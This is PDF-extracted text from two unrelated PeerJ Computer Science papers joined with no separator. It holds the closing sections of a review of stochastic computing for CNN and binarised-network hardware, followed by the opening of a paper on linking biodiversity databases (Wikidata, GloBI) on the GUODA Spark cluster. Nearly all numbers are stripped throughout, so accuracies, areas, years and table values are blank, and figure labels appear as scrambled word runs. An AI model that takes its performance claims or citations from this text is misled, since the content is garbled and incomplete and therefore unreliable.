/peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. xnor gate (‐ ) (‐ ) (+ ) (‐ ) (+ ) (+ ) (+ ) (‐ ) (‐ ) (‐ ) (+ ) (+ ) encoding (value) xnor multiply sc bipolar  multiply bnn vector  multiply . . ... ... ... ... a b c figure sc bnn methodology. (a) the similarity of sc and bnn in terms of logic gate utilisation. (b) usual configuration in binary bnn. (c) sc bnn first layer binary image conversion in sc bnn. full-size doi: . /peerjcs. /fig- this strategy could eliminate memory bandwidth bottlenecking by bringing memory closer to the computing element, namely, memory-centric computing or in-memory computing. sc cnn can greatly benefit from memory-centric architecture due to the nature of massive parallelism. memoisation approach could also be executed in memory-centric design by storing the weight data directly in a predefined stochastic bitstream representation instead of original binary values. as such, sequential read of stochastic bit from dwm could use less energy while reducing the sngs usage. further area reduction could be achieved by sharing apc and weights. thus, an area and power reduction of . % and . times were reported respectively relative to standard sc cnn as a result of resource sharing and more efficient memory-centric architecture in the sc cnn circuit. sc implementation in bnn: the best of both worlds as mentioned earlier in the basic concept section, bnn challenged the existence of sc circuits in cnn computing. as the saying goes, the enemy of an enemy is a friend, and considering that sc and bnn target efficient cnn computation, why not combine both to maximise the benefits from both aspects, which is what (hirtzlin et al., ) precisely targeted for. the inspiration for this particular approach is that the sc and bnn come into the same conclusion that xnor gate can be used as a bipolar multiplier, as depicted in fig. a, despite different directions of development. if somehow a way to process the bnn model in stochastic mean exists, then the sc can take a free ride to the bnn’s internal logic. although bnn process information at the bitwise level in the hidden layer, the initial layer still needs to deal with input images of fixed-point binary number as shown in lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. fig. b. in most cases, alu is utilised for real number calculation, or digital signal processing unit in the case of fpga. they attempted to fuse the sc domain onto the first layer by translating image input into stochastic bitstreams and then exploiting sc logic similarity in bnn for bipolar multiplication to take advantage of the bnn logic. however, unique data pre-processing is needed so that the trained network is trained on a serialised stochastic binary image instead of the original grayscale image. the input image is converted into multiple stochastic image representations as shown in fig. c where the bitstream generation of each pixel follows the function of sng. then, the number of stochastic images generated is equal to the stochastic bit length of the data. a ‘popcount’ accumulator is implemented at the end of the layer to restore the real number before proceeding to the next threshold function, which had replaced the activation function and batch normalisation. the difference of their bnn usage compared with the general bnn is that they treated the bnn xnor gate as if it is of sc cnn stochastic logic. 
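A rough software model of this first-layer fusion is sketched below; the image size, the number of stochastic image copies and the final thresholding step are assumptions used only to illustrate the conversion, XNOR multiplication and popcount flow described above.

```python
# Assumed model of the SC BNN first layer: expand a grayscale image into T
# stochastic binary images, XNOR-multiply each with binarised weights, then
# accumulate popcounts over the T copies and apply a threshold.
import numpy as np

rng = np.random.default_rng(6)
T = 8                                     # number of stochastic image copies
img = rng.random((4, 4))                  # grayscale pixels in [0, 1]
w = rng.choice([-1, 1], size=(4, 4))      # binarised first-layer weights

# SNG step: each stochastic image is a Bernoulli draw per pixel.
stoch_imgs = (rng.random((T, 4, 4)) < img).astype(np.int8)

acc = 0.0
for s in stoch_imgs:
    bipolar_bits = 2 * s - 1              # bit 0/1 -> bipolar -1/+1
    acc += np.sum(bipolar_bits * w)       # popcount equivalent of the XNOR array
acc /= T                                  # average over the T stochastic images

neuron_out = 1 if acc >= 0 else -1        # threshold replaces activation/batch norm
print(acc, neuron_out)
```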
notably, the sc only apply on the first layer, and the rest of the hidden layer still follows bnn logics. in the end, they claimed to have % area reduction whilst only suffer . % accuracy degradation in fashion-mnist dataset classification compared with the binary first-layer bnn. they also claimed that with three stochastic image representations, sc bnn could achieve the same performance as binary bnn implementation at . times lower energy usage, which is very similar to the edt approach. they even extended the experiment with advanced cifar- images with rgb channels. by following the same image conversion principle in channel-wise, the sc bnn achieved the same accuracy as full binary bnn, proving that eliminating alu at the first bnn layer is possible. nevertheless, one possible confusion is that they could have mistaken the bnn weight information as part of the stochastic domain. the bnn weights were trained in the binary domain with images of real fixed-point value, but it is not a concern as long as the bnn weights are represented in fully quantised ‘− ’ or ‘ ’ vector regardless of the computing domain. discussion we discussed the sc cnn and bnn elements in component-wise. however, a visualisation approach is necessary to obtain the full picture of how are they exactly being stacked together as sc cnn and sc bnn, which no one had emphasised on in almost all related studies. otherwise, novel readers might be having a hard time to grasp the idea and motives behind the effort of sc development, particularly for those studies mentioned above with the mixed bag of vastly different fields of study. sc cnn and sc bnn from a holistic perspective modern computing handles the cnn computation by aggregating all values layer-by-layer until the final class output is converged. the hidden truth behind the oversimplified drawing of cnn as in fig. c is that there could have a lot of data accumulation and transfer between the processor and memory. even if modern gpus could parallelise thousands of arithmetic operations, it still takes time to buffer computed data into local memory for each feature map or layer, because it is impossible to read and write on the same memory at the same time. lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. btanhbtanh a pc a pc sn bit sn bit sn sn bn snsn sn bn sn sn sn bn sn bn dense/classification layerflatten px conv  layerconv  layer px wbg array *  xnor gate conv  weight  * *  pixel sng conv  weight  * wbg array *  xnor gate *  px wbg array dense  weight  px * *  xnor gate  neurons  sc clock cycle  classes *bn = binary number *sn = stochastic number a pc btanh a pc btanh a pc a pc a pc a pc a pc btanhbtanhbtanhbtanhbtanh counter counter counter counter counter bn figure process flow in sc cnn and the internal computing domain interchange. full-size doi: . /peerjcs. /fig- conversely, sc handles the computation information in a different approach as depicted in fig. . due to the extreme parallelisation capability of the sc circuit, all of the data could be technically preloaded into local memory before the starting of the sc cycle. although stochastic stream could take hundreds or even thousands of clock cycles to complete (each clock for each stochastic bit), sc pipelined all cnn arithmetic operation from top-down. thus, all of the bits at a particular moment passed though all cnn layers at every sc clock cycle. 
if a clock cycle took µs, then a full-fledged sc cnn inference with -kilobit length stochastic streams could, in theory, complete the cnn computation in under ms. by then, a new full-sized image data could have been buffered asynchronously readily available for the next sc cycle. thus, in the perspective of the sc circuit, memory bandwidth bottlenecking might not be an issue. the simple computing elements in sc allow large-scale parallelisation, which is incredibly favourable to cnn hardware implementation in edge computing application. the advantage will only be highly prevalent when noise tolerance is essential at a higher clock speed in the future of computing or deployment of a big cnn model which requires larger data parallelisation. in the case of sc bnn as illustrated in fig. , the converted stochastic images could exploit the bnn xnor logic for sc, eliminating the need for alu. although the sc domain ended at the first layer, the subsequent bnn bipolar multiplication, accumulation and threshold loops do not take much computing time either, virtually single-layer pass in one or few clock cycles. given the nature of the layer-wise operation, bnn could in practice allow layer folding, that is, reusing the computer components of the previous layer by reloading weight information (mittal, ), further reducing the area and power required which are not possible on sc cnn. sc bnn also allows in-memory computation because those bit weights can be stored right next to the computing gate arrays, further improving energy efficiency by eliminating the cost of communication bandwidth. the ensemble technique on bnn could also perform as accurate as full precision dnn lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. st  layer stochastic  binarised  images …t sngs grayscale  image loop for t times, accumulate and  threshold into bnn bipolar bit loop for k layers hidden  layer final layer argmax bn sn bn bitsn bit bn *bn = binary number *sn = stochastic number *bit = bnn bit vector p o p co u n t a cc u m u la te  a n d   t h re sh o ld  [ ‐ , ] p o p co u n t binarised weights [‐ , ] c la ss e s figure process flow in sc bnn, stochastic image generation methodology and the internal com- puting domain interchange. full-size doi: . /peerjcs. /fig- table performance difference across sc and conventional binary domain. cnn model platform year method area (mm ) power (w) or energy (nj) accuracy (%) energy efficiency (images/j) or (gops/w) cpu software w . . gpu software . w . . asic sc bit (ren et al., ) . . w . , asic sc bit (li et al., a) . . w . , , lenet- asic sc dwm bit (ma et al., ) . . w . – cpu software w – . gpu software . w – . alexnet (last second layer) asic sc bit (li et al., a) . . w – , , asic binary . . mw – – asic sc mac . . mw – –custom ( x filter) asic sc dmac . . mw – – asic binary – nj . –custom (ardakani et al., ) asic integral sc – nj . – asic binary . . w – . gops/w convnet for mnist asic sc mac . . w – . gops/w asic bnn . nj –custom (hirtzlin et al., ) asic sc bnn . nj . – notes. gops, giga operations per second. (zhu, dong & su, ). thus, the area and power savings of sc bnn could be extreme, challenging the performance of sc cnn. although no standard reference exists for a fair comparison, we can compare the performance difference of sc cnn/bnn in cnn model-wise as shown in table to highlight the clear advantage of sc in cnn application. 
nevertheless, the year of comparable studies varies greatly, and hardware and software efficiencies had greatly improved over the last decade, thus should only be taken as a rough comparison. in lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table component-wise performance comparison of sc cnn. sc cnn/bnn components author platform/ software relative accuracy (%) area/gate count (%) power/energy saving (%) relative to integra sc ardakani et al. ( ) fpga & asic + . − . . binary computing esl canals et al. ( ) fpga − . – – binary computing apc + btanh kim, lee & choi ( a), kim, lee & choi ( b) and kim et al. ( ) synopsys design compiler − . ; − . (edt) − . . ; . (edt) binary computing apc with inverse adder li et al. ( a) synopsys design compiler – − . . normal apc sc maxpooling ren et al. ( ) synopsys design compiler − . − . . gpu computing sc relu activation li et al. ( a) synopsys design compiler − . − . . gpu computing sc normalisation li et al. ( b) synopsys design compiler − . − . . binary computing sc mac sim & lee ( ) synopsys design compiler − − . − . binary computing asica alexnet inceptionv vgg sc dmac hojabr et al. ( ) synopsys design compiler – − . mobilenet sc sigmoid activation li et al. ( a) freepdk − . − . . binary computing − . − . . binary computing – − . . unipolar sc sc quantization li et al. ( b) freepdk – − . . bipolar sc sc bnn hirtzlin et al. ( ) cadence first en- counter − . − . binary bnn notes. abinary computing asic apply to the cnn model comparison. the case of component-wise performance comparison, table could further clarify the performance number that had been mentioned in the previous section if any. conclusions the sc may still not well developed relatively speaking. still, with the trending of highly parallelised computing use case, sc might be the good old yet not-so-old idea, specifically when people are still actively researching and optimising sc circuits with the driving momentum of cnn algorithm. that being said, the fpga itself is still not widely adopted lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in the programming community, let alone the sc adaptation. numerous efforts were made in the high-level cnn to fpga translation for binary domain computation (liu et al., ; noronha, salehpour & wilton, ). however, the bridging effort of sc in fpga is near to non-existence or should be said most of the sc studies lean to asic. many people are interested in offloading computationally intensive workloads such as image processing and cnn inferencing to the co-processor. thus, sc elements should be made an open-source ips and introduced into the fpga design ecosystem so that people can innovate on it. the open-sourcing design could help accelerate the sc development because researchers do not have to redesign the ip from scratch which is the major hurdle for novel development and could turn down people from being interested in sc technology. it could be the primary reason why sc cnn lacks attention, leading to a low number of comparable data as well as benchmarking. speaking of parallelism capability in sc, data bandwidth bottlenecking could be a major challenge. even though sc can have vast arrays of wbg or comparator to compare a massive amount of binary values at once, delivering massive data on time is challenging. 
notably, sc does require hundreds if not thousands of clock cycles to complete. thus, data transfer could be pipelined and buffered asynchronously. moreover, a tremendous amount of data needs to be ready beside the sc elements. as such, local memory element such as sram (in asic terms) or bram/flip-flop (in fpga term) limitation should be the concern. in any case, memory-centric computing design should be the direction of sc development, especially in sc cnn, where hundreds of thousands, even millions of operations could be parallelised. there are still a lot of optimisation rooms for sc implementation on fpga since most of the modern fpga consists of -input lookup tables. asic logic might not be able to translate into the fpga fabric efficiently because lookup tables are hardwired. although fpga is flexible in terms of hardware implementation, it is not as customisable as the asic. modern fpga also consists of other resources capable of performance computing such as digital signal processors or arithmetic logic awaiting to be utilised. however, those aspects could only be discovered in future research efforts. nomenclature adc analog-to-digital converter alu arithmetic logic unit apc approximate parallel counter asc analog-to-stochastic converter asic application-specific integrated circuit bnn binarised neural network btanh binary input stanh cnn convolutional neural network cpu central processing unit dnn deep neural network dwm domain-wall memory edt early decision termination lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. fa full adder fpga field-programmable gate array fpu floating-point unit fsm finite state machine gpu graphic processing unit iot internet of things lfsr linear feedback shift register mac multiplier-accumulator relu rectified linear unit rng random number generator sc stochastic computing sng stochastic number generator suc shifted unary code stanh stochastic tanh tanh hyperbolic tangent wbg weighted binary generator additional information and declarations funding this research was funded by the school of electrical and electronic engineering, universiti sains malaysia ( /pelect/ ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: school of electrical and electronic engineering, universiti sains malaysia: /p- elect/ . competing interests the authors declare there are no competing interests. author contributions • yang yang lee conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • zaini abdul halim analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: no raw data is available for literature review. lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. references alaghi a, hayes jp. . survey of stochastic computing. transactions on embedded computing systems : doi . / . . alaghi a, qian w, hayes jp. . the promise and challenge of stochastic computing. ieee transactions on computer-aided design of integrated circuits and systems : – doi . /tcad. . . angizi s, fan d. . 
imc: energy-efficient in-memory convolver for accelerating binarized deep neural network. in: acm international conference proceeding series -july. doi . / . . ardakani a, leduc-primeau f, onizawa n, hanyu t, gross wj. . vlsi im- plementation of deep neural network using integral stochastic computing. ieee transactions on very large scale integration (vlsi) systems : – doi . /tvlsi. . . brown bd, card hc. . stochastic neural computation i: computational elements. ieee transactions on computers : – doi . / . . canals v, morro a, oliver a, alomar ml, rosselló jl. . a new stochas- tic computing methodology for efficient neural network implementation. ieee transactions on neural networks and learning systems : – doi . /tnnls. . . capra m, bussolino b, marchisio a, shafique m, masera g, martina m. . an up- dated survey of efficient hardware architectures for accelerating deep convolutional neural networks. future internet : doi . /fi . chen th, hayes jp. . design of division circuits for stochastic computing. in: proceedings of ieee computer society annual symposium on vlsi, isvlsi - september. piscataway: ieee, – doi . /isvlsi. . . chen th, ting p, hayes jp. . achieving progressive precision in stochastic comput- ing. in: ieee global conference on signal and information processing, globalsip . piscataway: ieee, – doi . /globalsip. . . chu si. . new divider design for stochastic computing. ieee transactions on circuits and systems ii: express briefs : – doi . /tcsii. . . de aguiar jm, khatri sp. . exploring the viability of stochastic computing. in: proceedings of the rd ieee international conference on computer design, iccd . piscataway: ieee, – doi . /iccd. . . fei-fei l, deng j, li k. . imagenet: a large-scale hierachical image database. journal of vision : – doi . / . . . galloway a, taylor gw, moussa m. . attacking binarized neural networks. in: th international conference on learning representations, iclr —conference track proceedings. – . hinton ge, srivastava n, krizhevsky a, sutskever i, salakhutdinov rr. . improv- ing neural networks by preventing co-adaptation of feature detectors. – arxiv preprint. arxiv: . . lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / . http://dx.doi.org/ . /tcad. . http://dx.doi.org/ . / . http://dx.doi.org/ . /tvlsi. . http://dx.doi.org/ . / . http://dx.doi.org/ . /tnnls. . http://dx.doi.org/ . /fi http://dx.doi.org/ . /isvlsi. . http://dx.doi.org/ . /globalsip. . http://dx.doi.org/ . /tcsii. . http://dx.doi.org/ . /iccd. . http://dx.doi.org/ . / . . http://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. hirtzlin t, penkovsky b, bocquet m, klein jo, portal jm, querlioz d. . stochastic computing for hardware implementation of binarized neural networks. ieee access : – doi . /access. . . hojabr r, givaki k, tayaranian smr, esfahanian p, khonsari a, rahmati d, najafi mh. . skippynn: an embedded stochastic-computing accelerator for convo- lutional neural networks. in: proceedings—design automation conference. new york: acm, – doi . / . . ichihara h, ishii s, sunamori d, iwagaki t, inoue t. . compact and accurate stochastic circuits with shared random number sources. in: nd ieee inter- national conference on computer design, iccd . piscataway: ieee, – doi . /iccd. . . ioffe s, szegedy c. . batch normalization: accelerating deep network training by reducing internal covariate shift. proceedings of the nd international conference on machine learning : – doi . / . . . 
jayakumar h, raha a, kim y, sutar s, lee ws, raghunathan v. . energy-efficient system design for iot devices. in: proceedings of the asia and south pacific design automation conference, asp-dac - -january. piscataway: ieee, – doi . /aspdac. . . joe h, kim y. . novel stochastic computing for energy-efficient image processors. electronics : – doi . /electronics . kim k, kim j, yu j, seo j, lee j, choi k. . dynamic energy-accuracy trade-off using stochastic computing in deep neural networks. in: proceedings—design automation conference - -june. doi . / . . kim k, lee j, choi k. a. an energy-efficient random number generator for stochastic circuits. in: proceedings of the asia and south pacific design au- tomation conference, asp-dac - -january. new york: acm, – doi . /aspdac. . . kim k, lee j, choi k. b. approximate de-randomizer for stochastic circuits. in: isocc —international soc design conference: soc for internet of everything (ioe). – doi . /isocc. . . li z, li j, ren a, cai r, ding c, qian x, draper j, yuan b, tang j, qiu q, wang y. a. heif: highly efficient stochastic computing-based inference framework for deep neural networks. ieee transactions on computer-aided design of integrated circuits and systems : – doi . /tcad. . . li b, najafi mh, yuan b, lilja dj. b. quantized neural networks with new stochas- tic multipliers. in: proceedings—international symposium on quality electronic design, isqed -march. – doi . /isqed. . . li b, qin y, yuan b, lilja dj. a. neural network classifiers using stochastic com- puting with a hardware-oriented approximate activation function. in: proceedings— th ieee international conference on computer design, iccd . piscataway: ieee, – doi . /iccd. . . li j, yuan z, li z, ding c, ren a, qiu q, draper j, wang y. b. hardware-driven nonlinear activation for stochastic computing based deep convolutional neural lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /access. . http://dx.doi.org/ . / . http://dx.doi.org/ . /iccd. . http://dx.doi.org/ . / . . http://dx.doi.org/ . /aspdac. . http://dx.doi.org/ . /electronics http://dx.doi.org/ . / . http://dx.doi.org/ . /aspdac. . http://dx.doi.org/ . /isocc. . http://dx.doi.org/ . /tcad. . http://dx.doi.org/ . /isqed. . http://dx.doi.org/ . /iccd. . http://dx.doi.org/ . /peerj-cs. networks. in: proceedings of the international joint conference on neural networks - may. new york: acm, – doi . /ijcnn. . . li j, yuan z, li z, ren a, ding c, draper j, nazarian s, qiu q, yuan b, wang y. c. normalization and dropout for stochastic computing-based deep convolutional neural networks. integration : – doi . /j.vlsi. . . . liew ss, khalil-hani m, ahmad radzi s, bakhteri r. . gender classification: a convolutional neural network approach. turkish journal of electrical engineering and computer sciences : – doi . /elk- - . liu z, dou y, jiang j, xu j. . automatic code generation of convolutional neu- ral networks in fpga implementation. in: proceedings of the international conference on field-programmable technology, fpt . piscataway: ieee, – doi . /fpt. . . ma x, zhang y, yuan g, ren a, li z, han j, hu j, wang y. . an area and en- ergy efficient design of domain-wall memory-based deep convolutional neural networks using stochastic computing. in: proceedings—international symposium on quality electronic design, isqed -march. piscataway: ieee, – doi . /isqed. . . mittal s. . a survey of fpga-based accelerators for convolutional neural networks. 
neural computing and applications : – doi . /s - - - . najafi mh, li p, lilja dj, qian w, bazargan k, riedel m. . a reconfigurable architecture with sequential logic-based stochastic computing. acm journal on emerging technologies in computing systems : doi . / . naveen s, kounte mr. . key technologies and challenges in iot edge computing. in: third international conference on i-smac (iot in social, mobile, analytics and cloud) (i-smac). piscataway: ieee, – doi . /i-smac . . . noronha dh, salehpour b, wilton sje. . leflow: enabling flexible fpga high-level synthesis of tensorflow deep neural networks. in: th international workshop on fpgas for software programmers, fsp , co-located with international conference on field programmable logic and applications, fpl . – . nurvitadhi e, sheffield d, sim j, mishra a, venkatesh g, marr d. . accelerating binarized neural networks: comparison of fpga, cpu, gpu, and asic. in: proceedings of the international conference on field-programmable technology, fpt . piscataway: ieee, – doi . /fpt. . . ren a, li z, ding c, qiu q, wang y, li j, qian x, yuan b. . sc-dcnn: highly-scalable deep convolutional neural network using stochastic comput- ing. in: international conference on architectural support for programming lan- guages and operating systems—asplos part f . new york: acm, – doi . / . . ren a, li z, wang y, qiu q, yuan b. . designing reconfigurable large-scale deep learning systems using stochastic computing. in: ieee international conference on rebooting computing, icrc —conference proceedings. piscataway: ieee, doi . /icrc. . . lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ijcnn. . http://dx.doi.org/ . /j.vlsi. . . http://dx.doi.org/ . /elk- - http://dx.doi.org/ . /fpt. . http://dx.doi.org/ . /isqed. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://dx.doi.org/ . /i-smac . . http://dx.doi.org/ . /fpt. . http://dx.doi.org/ . / . http://dx.doi.org/ . /icrc. . http://dx.doi.org/ . /peerj-cs. salehi sa. . low-cost stochastic number generators for stochastic computing. ieee transactions on very large scale integration (vlsi) systems : – doi . /tvlsi. . . sim h, lee j. . a new stochastic computing multiplier with application to deep convolutional neural networks. in: proceedings—design automation conference part . new york: acm, – doi . / . . sim h, nguyen d, lee j, choi k. . scalable stochastic-computing accelera- tor for convolutional neural networks. in: proceedings of the asia and south pacific design automation conference, asp-dac. piscataway: ieee, – doi . /aspdac. . . simons t, lee dj. . a review of binarized neural networks. electronics : doi . /electronics . xie y, liao s, yuan b, wang y, wang z. . fully-parallel area-efficient deep neural network design using stochastic computing. . piscataway: ieee, – doi . /tcsii. . . yang m, li b, lilja dj, yuan b, qian w. . towards theoretical cost limit of stochas- tic number generators for stochastic computing. in: proceedings of ieee computer society annual symposium on vlsi, isvlsi -july. piscataway: ieee, – doi . /isvlsi. . . yu j, kim k, lee j, choi k. . accurate and efficient stochastic computing hard- ware for convolutional neural networks. in: proceedings - th ieee interna- tional conference on computer design, iccd . piscataway: ieee, – doi . /iccd. . . zhakatayev a, lee s, sim h, lee j. . sign-magnitude sc: getting x accuracy for free in stochastic computing for deep neural networks. 
in: proceedings—design automa- tion conference part f . new york: acm, – doi . / . . zhang y, zhang x, song j, wang y, huang r, wang r. . parallel convolutional neural network (cnn) accelerators based on stochastic computing. in: ieee workshop on signal processing systems, sips: design and implementation. piscataway: ieee, – doi . /sips . . . zhu s, dong x, su h. . binary ensemble neural network: more bits per network or more networks per bit? in: proceedings of the ieee computer society conference on computer vision and pattern recognition -june. piscataway: ieee, – doi . /cvpr. . . lee and abdul halim ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tvlsi. . http://dx.doi.org/ . / . http://dx.doi.org/ . /aspdac. . http://dx.doi.org/ . /electronics http://dx.doi.org/ . /tcsii. . http://dx.doi.org/ . /isvlsi. . http://dx.doi.org/ . /iccd. . http://dx.doi.org/ . / . http://dx.doi.org/ . /sips . . http://dx.doi.org/ . /cvpr. . http://dx.doi.org/ . /peerj-cs. submitted may accepted august published september corresponding author anne e. thessen, annethessen@gmail.com academic editor alessandro frigeri additional information and declarations can be found on page doi . /peerj-cs. copyright thessen et al. distributed under creative commons cc-by . open access gb in minutes: a case for linking major biodiversity databases using an open socio-technical infrastructure and a pragmatic, cross-institutional collaboration anne e. thessen , , jorrit h. poelen , matthew collins and jen hammock ronin institute for independent scholarship, montclair, nj, usa independent consultant, oakland, ca, usa university of florida, gainsville, fl, usa national museum of natural history, washington, dc, usa oregon state university, corvallis, or, usa abstract biodiversity information is made available through numerous databases that each have their own data models, web services, and data types. combining data across databases leads to new insights, but is not easy because each database uses its own system of identifiers. in the absence of stable and interoperable identifiers, databases are often linked using taxonomic names. this labor intensive, error prone, and lengthy process relies on accessible versions of nomenclatural authorities and fuzzy-matching algorithms. to approach the challenge of linking diverse data, more than technology is needed. new social collaborations like the global unified open data architecture (guoda) that combines skills from diverse groups of computer engineers from idigbio, server resources from the advanced computing and information systems (acis) lab, global-scale data presentation from eol, and independent developers and researchers are what is needed to make concrete progress on finding relationships between biodiversity datasets. this paper will discuss a technical solution developed by the guoda collaboration for faster linking across databases with a use case linking wikidata and the global biotic interactions database (globi). the guoda infrastructure is a -node, high performance computing cluster made up of about threads with tb of storage and gb memory. using guoda, gb of compressed json from wikidata was processed and linked to globi in about – min. instead of comparing name strings or relying on a single identifier, wikidata and globi were linked by comparing graphs of biodiversity identifiers external to each system. this method resulted in adding , wikidata links in globi, an increase of . % of all outgoing name links in globi. 
wikidata and globi were compared to open tree of life reference taxonomy to examine consistency and coverage. the process of parsing wikidata, open tree of life reference taxonomy and globi archives and calculating consistency metrics was done in minutes on the guoda platform. as a model collaboration, guoda has the potential to revolutionize biodiversity science by bringing diverse technically minded people together with high performance computing how to cite this article thessen et al. ( ), gb in minutes: a case for linking major biodiversity databases using an open socio- technical infrastructure and a pragmatic, cross-institutional collaboration. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:annethessen@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. resources that are accessible from a laptop or desktop. however, participating in such a collaboration still requires basic programming skills. subjects bioinformatics, databases keywords biodiversity, collaboration, identifiers, wikidata, graph, linking introduction biodiversity databases provide global access to information about species via the web. these databases contain information as varied as observation records, text descriptions, images, maps, genetic sequences, phylogenetic trees, and trait data (table ). all of these data become much more useful if they can be linked. many biodiversity databases share information with each other (bingham et al., ), but creating the links can be very difficult for several reasons including the size of the databases, the heterogeneous nature of the data, and the heterogeneous nature of the identifiers used by the different resources (page, ). the more popular methods for linking biodiversity databases include taxonomic names, lsid (life sciences identifier), and doi (digital object identifier). the encyclopedia of life uses taxonomic names to automatically aggregate data from hundreds of providers (parr et al., ). bionames links data using lsid, doi, handles, bibliographic citations, and taxonomic names (page, ). the iphylo linkout service mapped identifiers used by the ncbi taxonomy database (which provides the taxonomic backbone for genbank) to wikipedia pages using taxonomic names, including synonyms (page, ). tbmap provides links from treebase across several taxonomic databases, such as itis and ncbi (page, ). this mapping was also achieved using taxonomic names, but in some cases genbank accession numbers and museum specimen codes were available for supplement. the use of taxonomic names to aggregate data can lead to errors and requires significant a priori knowledge either in the form of curators or an authoritative nomenclature. many databases expose their own internal identifiers, such as the worms aphia id, so others can link their data to those resources within their own systems, often by providing a url. databases like worms provide web services that allow users to look up an identifier for a taxon in question, one at a time. while this makes linking easier, it is still difficult to scale across all databases. for example, a list of all the taxon identifiers in eol is mb compressed. no system of identifiers is universal across biodiversity databases and none of them are easy to implement at scale. 
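The fragility of name-string linking, as opposed to identifier-based linking, can be illustrated with a few lines of standard-library Python. The names and identifiers below are made up for the example and do not come from any real checklist.

import difflib

# Hypothetical authority list mapping name strings to made-up identifiers.
authority = {
    "Panthera leo": "TAXON:0001",
    "Panthera onca": "TAXON:0002",
    "Pluvialis obscura": "TAXON:0003",
}

# Incoming records with spelling and formatting variants.
records = ["Panthera  leo", "panthera onca", "Pluvialis obscurus"]

def normalise(name):
    return " ".join(name.lower().split())

lookup = {normalise(k): v for k, v in authority.items()}
for raw in records:
    key = normalise(raw)
    if key in lookup:
        print(raw, "->", lookup[key], "(exact match after normalisation)")
    else:
        close = difflib.get_close_matches(key, lookup.keys(), n=1, cutoff=0.85)
        hit = lookup[close[0]] if close else None
        print(raw, "->", hit, "(fuzzy match, needs review)")

Every fuzzy hit needs curation or an authoritative synonym list, which is why name-based aggregation is slow and error prone at scale, whereas records that already share an identifier can simply be joined.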
while the data would be much more useful if linked, there is a lack of tools for linking data across databases at scale. most mappings are done at great expense and then are made available as a separate file or incorporated into the resources themselves. linkout, bionames, gbif, and eol take more than a day to link across their entire body of aggregated content. this paper discusses links made between globi and wikidata (wd) in min using guoda, a high performance computing system available for analysis of large biodiversity data sets. thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table selected biodiversity databases and their size. database data quantity (jan ) size (compressed) gbif , , occurrence records gb catalogue of life/itis . million taxa . gb globi , , interactions mb idigbio , , specimen records . gb genbank , , sequences tb biodiversity heritage library , , pages . gb worms , marine species mb opentree , , taxa and , trees mb eol traitbank over million records gb uncompressed eol , , data objects (may ) tb uncompressed wikidata , , data items gb methods description of resources guoda following an idigbio hack-a-thon in june , guoda was created as a pragmatic way to compute over multiple large biodiversity databases in a mutually beneficial collaboration between idigbio, eol, kew garden, and independent developers. catalyzed by various presentations at conferences, hardware provided by acis, + meetings, and several prototypes (e.g., http://effechecka.org, https://gimmefreshdata.github.io), a general access biodiversity data integration and analysis environment was created. this environment, with the aggregated experience and perspectives of all the collaborators, was used to produce the results of this paper. housed at the acis lab at the university of florida, the guoda infrastructure consists of ibm hs blades each with cores, gb of memory, and tb of storage each. this makes a total of threads, gb of memory and tb of disk space available for processing jobs using apache spark (fig. ; zaharia et al., ). the cluster is managed under apache mesos (hindman et al., ) which is a distributed scheduling system for periodic jobs. for long running processes, such as web apis or databases, the marathon (https://github.com/mesosphere/marathon) framework is run within mesos. marathon facilitates running always-up services with monitoring, automatic deployment of code, re-scaling to multiple nodes, and other management features. mesos is responsible for accepting requests to start spark frameworks, processes which do the actual computation and may span multiple servers, and allocation of resources requested by the framework. hadoop hdfs (shvachko et al., ) is installed outside of mesos directly on all nodes of the cluster and provides redundant parallel shared storage to all nodes as well as the jupyter notebook (kluyver et al., ) server that provides a programming interface to end users. each node has tb of local disk storage for a total of about . tb of usable storage space for data files in apache parquet format. spark is aware of the placement of data on an hdfs cluster and will divide processing among nodes in a way that prefers to read and write data that is local to the node to minimize network traffic. thessen et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://effechecka.org https://gimmefreshdata.github.io) https://github.com/mesosphere/marathon http://dx.doi.org/ . /peerj-cs. 
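A job on this kind of cluster is typically a few lines of Spark code run from the notebook front end. The sketch below shows the general shape of such a job in PySpark; the HDFS path and column name are hypothetical placeholders rather than GUODA's actual data layout.

from pyspark.sql import SparkSession

spark = (SparkSession.builder
         .appName("guoda-example")
         .getOrCreate())

# Spark schedules work close to the HDFS blocks holding each partition,
# which is what keeps network traffic low on a cluster like this one.
taxa = spark.read.parquet("hdfs:///guoda/data/example-taxa.parquet")  # hypothetical path

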